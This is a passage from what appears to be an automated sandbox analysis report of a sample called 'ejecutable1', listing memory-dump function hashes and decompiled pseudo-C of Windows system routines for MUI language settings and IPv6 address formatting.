                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                    • Instruction ID: e398e752639f486330b137eae2efdaa7704392bc7c8159ce242d2edde1894976
                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                    • Instruction Fuzzy Hash: 3DF02220324049ABEB29EA1C8D5166A33D6FB96300F68C038ED4DCBA11D635DE408291
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008910D0, Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                    • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                    • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                    • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00890060, Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                    • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                    • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                    • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008901D4, Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                    • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                    • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                    • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0089010C, Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                    • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                    • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                    • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00891148, Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                    • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                    • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                    • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008B8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 94%
                                                                    			E008B8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E008B8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0089E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E008B718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E008B8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E008B718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E008B8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E008B8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E008B8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E008B718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00892340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E008AE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0089E2A8(_t322,  &_v68, _v16);
								if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E008AE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0089E2A8(_t322,  &_v68, _t236);
								if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E008B718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00892340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E008AE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0089E2A8(_v12,  &_v68, _v16);
							if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E008AE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0089E2A8(_t322,  &_v68, _t269);
							if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E008B718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0089E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00892340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E008AE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0089E2A8(_v12,  &_v68, _v16);
						if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E008AE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0089E2A8(_t322,  &_v68, _t296);
						if(E008B5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0089E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                                    0x008b8788
                                                                    0x008b8788
                                                                    0x008b8791
                                                                    0x008b8794
                                                                    0x008b8798
                                                                    0x008b879b
                                                                    0x008b879e
                                                                    0x008b87a1
                                                                    0x008b87a4
                                                                    0x008b87a7
                                                                    0x008b87aa
                                                                    0x008b87af
                                                                    0x00901ad3
                                                                    0x008b8b0a
                                                                    0x008b8b0d
                                                                    0x008b8b13
                                                                    0x008b8b19
                                                                    0x008b8b1f
                                                                    0x008b8b25
                                                                    0x008b8b2b
                                                                    0x008b8b31
                                                                    0x008b8b37
                                                                    0x008b8b3d
                                                                    0x008b8b46
                                                                    0x008b8b46
                                                                    0x008b87c6
                                                                    0x008b87d0
                                                                    0x00901ae0
                                                                    0x00901ae6
                                                                    0x00901af8
                                                                    0x00901af8
                                                                    0x00901afd
                                                                    0x00901afe
                                                                    0x00901b01
                                                                    0x00901b06
                                                                    0x00901b06
                                                                    0x008b87d6
                                                                    0x008b87f2
                                                                    0x008b87f7
                                                                    0x008b8807
                                                                    0x008b880a
                                                                    0x008b880f
                                                                    0x008b8810
                                                                    0x008b8813
                                                                    0x008b8818
                                                                    0x008b8818
                                                                    0x008b882c
                                                                    0x008b8831
                                                                    0x008b8838
                                                                    0x008b8908
                                                                    0x008b8920
                                                                    0x008b89f0
                                                                    0x008b8a08
                                                                    0x008b8af6
                                                                    0x008b8af6
                                                                    0x008b8af8
                                                                    0x008b8afb
                                                                    0x00901beb
                                                                    0x00901beb
                                                                    0x008b8b04
                                                                    0x00901bf8
                                                                    0x00901c0e
                                                                    0x00901c13
                                                                    0x00901c16
                                                                    0x00901c16
                                                                    0x00901bf8
                                                                    0x00000000
                                                                    0x008b8b04
                                                                    0x008b8a0e
                                                                    0x008b8a11
                                                                    0x008b8a14
                                                                    0x008b8a15
                                                                    0x008b8a18
                                                                    0x008b8a22
                                                                    0x008b8b59
                                                                    0x008b8a28
                                                                    0x008b8a3c
                                                                    0x008b8a3c
                                                                    0x008b8a42
                                                                    0x00901bb0
                                                                    0x00901b11
                                                                    0x00901b11
                                                                    0x00000000
                                                                    0x008b8a48
                                                                    0x008b8a51
                                                                    0x008b8a5b
                                                                    0x008b8a5e
                                                                    0x008b8a61
                                                                    0x008b8a69
                                                                    0x008b8a69
                                                                    0x008b8a6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x008b8a74
                                                                    0x008b8a7c
                                                                    0x008b8a7d
                                                                    0x008b8a91
                                                                    0x008b8a93
                                                                    0x008b8a93
                                                                    0x008b8a98
                                                                    0x008b8a9b
                                                                    0x008b8aa1
                                                                    0x008b8aa1
                                                                    0x008b8aa4
                                                                    0x008b8aaa
                                                                    0x008b8ab1
                                                                    0x008b8ac5
                                                                    0x008b8ac7
                                                                    0x008b8ac7
                                                                    0x008b8ac5
                                                                    0x008b8ace
                                                                    0x00901bc9
                                                                    0x00901bce
                                                                    0x00901bd2
                                                                    0x00901bd2
                                                                    0x008b8ad8
                                                                    0x008b8aeb
                                                                    0x008b8aeb
                                                                    0x008b8af0
                                                                    0x008b8af4
                                                                    0x00000000
                                                                    0x008b8af4
                                                                    0x008b8a42
                                                                    0x008b8926
                                                                    0x008b8929
                                                                    0x008b892c
                                                                    0x008b892d
                                                                    0x008b8930
                                                                    0x008b8935
                                                                    0x008b893a
                                                                    0x008b8b51
                                                                    0x008b8940
                                                                    0x008b8954
                                                                    0x008b8954
                                                                    0x008b895a
                                                                    0x00901b63
                                                                    0x00000000
                                                                    0x008b8960
                                                                    0x008b8969
                                                                    0x008b8973
                                                                    0x008b8976
                                                                    0x008b8979
                                                                    0x008b897e
                                                                    0x008b8981
                                                                    0x008b8981
                                                                    0x008b8986
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00901b6e
                                                                    0x00901b74
                                                                    0x00901b7b
                                                                    0x00901b8f
                                                                    0x00901b91
                                                                    0x00901b91
                                                                    0x00901b99
                                                                    0x00901b9c
                                                                    0x00901ba2
                                                                    0x00901ba2
                                                                    0x008b898c
                                                                    0x008b8992
                                                                    0x008b8999
                                                                    0x008b89ad
                                                                    0x00901ba8
                                                                    0x00901ba8
                                                                    0x008b89ad
                                                                    0x008b89b6
                                                                    0x008b89c8
                                                                    0x008b89cd
                                                                    0x008b89d0
                                                                    0x008b89d0
                                                                    0x008b89d6
                                                                    0x008b89e8
                                                                    0x008b89e8
                                                                    0x008b89ed
                                                                    0x00000000
                                                                    0x008b89ed
                                                                    0x008b895a
                                                                    0x008b883e
                                                                    0x008b8841
                                                                    0x008b8844
                                                                    0x008b8845
                                                                    0x008b8848
                                                                    0x008b884d
                                                                    0x008b8852
                                                                    0x008b8b49
                                                                    0x008b8858
                                                                    0x008b886c
                                                                    0x008b886c
                                                                    0x008b8872
                                                                    0x00901b0e
                                                                    0x00000000
                                                                    0x008b8878
                                                                    0x008b8881
                                                                    0x008b888b
                                                                    0x008b888e
                                                                    0x008b8891
                                                                    0x008b8896
                                                                    0x008b8899
                                                                    0x008b8899
                                                                    0x008b889e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00901b21
                                                                    0x00901b27
                                                                    0x00901b2e
                                                                    0x00901b42
                                                                    0x00901b44
                                                                    0x00901b44
                                                                    0x00901b4c
                                                                    0x00901b4f
                                                                    0x00901b55
                                                                    0x00901b55
                                                                    0x008b88a4
                                                                    0x008b88aa
                                                                    0x008b88b1
                                                                    0x008b88c5
                                                                    0x00901b5b
                                                                    0x00901b5b
                                                                    0x008b88c5
                                                                    0x008b88ce
                                                                    0x008b88e0
                                                                    0x008b88e5
                                                                    0x008b88e8
                                                                    0x008b88e8
                                                                    0x008b88ee
                                                                    0x008b8900
                                                                    0x008b8900
                                                                    0x008b8905
                                                                    0x00000000
                                                                    0x008b8905

                                                                    APIs
                                                                    Strings
                                                                    • Kernel-MUI-Language-Allowed, xrefs: 008B8827
                                                                    • Kernel-MUI-Language-SKU, xrefs: 008B89FC
                                                                    • WindowsExcludedProcs, xrefs: 008B87C1
                                                                    • Kernel-MUI-Number-Allowed, xrefs: 008B87E6
                                                                    • Kernel-MUI-Language-Disallowed, xrefs: 008B8914
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.442394259.0000000000880000.00000040.00000001.sdmp, Offset: 00870000, based on PE: true
                                                                    • Associated: 00000002.00000002.442387842.0000000000870000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442480219.0000000000960000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442488332.0000000000970000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442495332.0000000000974000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442502291.0000000000977000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442507288.0000000000980000.00000040.00000001.sdmp Download File
                                                                    • Associated: 00000002.00000002.442548837.00000000009E0000.00000040.00000001.sdmp Download File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_870000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: _wcspbrk
                                                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                    • API String ID: 402402107-258546922
                                                                    • Opcode ID: b673d47f998644b01179fb3313dcdf6d8fe98ebf6663683cd00129f280114689
                                                                    • Instruction ID: 7dcd3096d27955bd19329ac7af23fd289acd16431177d18791ab99e775b66378
                                                                    • Opcode Fuzzy Hash: b673d47f998644b01179fb3313dcdf6d8fe98ebf6663683cd00129f280114689
                                                                    • Instruction Fuzzy Hash: 5DF1D7B2D00209EFDF11EF99C981AEEBBB8FF08304F14446AE505E7251EB359A45DB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 008D13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 38%
                                                                    			E008D13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = L008C7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x892926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = L008C7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x899cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + L008C7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + L008C7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = L008C7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = L008C7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                    0x008d13d5
                                                                    0x008d13d9
                                                                    0x008d13dc
                                                                    0x008d13de
                                                                    0x008d13e1
                                                                    0x008d13e8
                                                                    0x008d13ee
                                                                    0x008fe8fd
                                                                    0x00000000
                                                                    0x008fe921
                                                                    0x008fe921
                                                                    0x008fe928
                                                                    0x008fe982
                                                                    0x008fe98a
                                                                    0x00000000
                                                                    0x008fe99a
                                                                    0x008fe99e
                                                                    0x008fe9a3
                                                                    0x008fe9a8
                                                                    0x008fe9b9
                                                                    0x008fe978
                                                                    0x00000000
                                                                    0x008fe978
                                                                    0x008fe98a
                                                                    0x008fe92a
                                                                    0x008fe931
                                                                    0x008fe944
                                                                    0x008fe944
                                                                    0x008fe950
                                                                    0x008fe954
                                                                    0x008fe959
                                                                    0x008fe95e
                                                                    0x008fe963
                                                                    0x008fe970
                                                                    0x00000000
                                                                    0x008fe975
                                                                    0x008fe93b
                                                                    0x008fe980
                                                                    0x00000000
                                                                    0x008fe980
                                                                    0x008fe942
                                                                    0x008fe94b
                                                                    0x00000000
                                                                    0x008fe94b
                                                                    0x00000000
                                                                    0x008fe942
                                                                    0x008d13f4
                                                                    0x008d13f4
                                                                    0x008d13f9
                                                                    0x008d13fc
